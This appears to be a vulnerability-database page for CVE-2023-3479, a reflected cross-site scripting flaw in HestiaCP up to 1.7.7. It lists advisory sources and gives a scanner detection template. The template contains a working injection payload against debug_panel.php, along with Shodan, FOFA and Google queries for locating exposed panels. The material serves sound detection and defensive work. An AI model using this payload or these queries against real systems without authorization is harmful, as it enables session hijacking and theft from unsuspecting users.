| Reporter | Title | Published | Views | Family All 11 |
|---|---|---|---|---|
| Reflected XSS | 29 Jun 202316:45 | – | huntr | |
| CVE-2023-3479 | 30 Jun 202314:15 | – | circl | |
| HestiaCP 跨站脚本漏洞 | 30 Jun 202300:00 | – | cnnvd | |
| CVE-2023-3479 | 30 Jun 202309:55 | – | cve | |
| CVE-2023-3479 Cross-site Scripting (XSS) - Reflected in hestiacp/hestiacp | 30 Jun 202309:55 | – | cvelist | |
| CVE-2023-3479 | 30 Jun 202310:15 | – | nvd | |
| CVE-2023-3479 Cross-site Scripting (XSS) - Reflected in hestiacp/hestiacp | 30 Jun 202309:55 | – | osv | |
| Cross site scripting | 30 Jun 202310:15 | – | prion | |
| PT-2023-25008 · Hestiacp · Hestiacp | 30 Jun 202300:00 | – | ptsecurity | |
| CVE-2023-3479 | 23 May 202502:29 | – | redhatcve |
id: CVE-2023-3479
info:
name: Hestiacp <= 1.7.7 - Cross-Site Scripting
author: edoardottt
severity: medium
description: |
Cross-site Scripting (XSS) - Reflected in GitHub repository hestiacp/hestiacp prior to 1.7.8.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of a victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
remediation: |
Upgrade to the latest version of Hestiacp (1.7.8 or higher) to mitigate this vulnerability.
reference:
- https://huntr.dev/bounties/6ac5cf87-6350-4645-8930-8f2876427723/
- https://nvd.nist.gov/vuln/detail/CVE-2023-3479
- https://github.com/hestiacp/hestiacp/commit/2326aa525a7ba14513af783f29cb5e62a476e67a
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2023-3479
cwe-id: CWE-79
epss-score: 0.01277
epss-percentile: 0.66343
cpe: cpe:2.3:a:hestiacp:control_panel:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: hestiacp
product: control_panel
shodan-query:
- http.favicon.hash:-476299640
- http.title:"hestia control panel"
fofa-query:
- title="hestia control panel"
- icon_hash=-476299640
google-query: intitle:"hestia control panel"
tags: cve2023,cve,huntr,hestiacp,xss,intrusive,vuln
http:
- method: GET
path:
- '{{BaseURL}}/templates/pages/debug_panel.php?id={{randstr}}"><script>alert(document.domain)</script>'
matchers-condition: and
matchers:
- type: word
part: body
words:
- debug-panel
- <script>alert(document.domain)</script>
condition: and
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
# digest: 4a0a0047304502206c7cc38a43142c595219ad0600581b5ef467d8c2e8ee44cf17ceeca871ac7a3e02210098c9bd0ca19091f0f70bf316974c80b8b05d4d04799a85cd7820f9ffe6521258:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation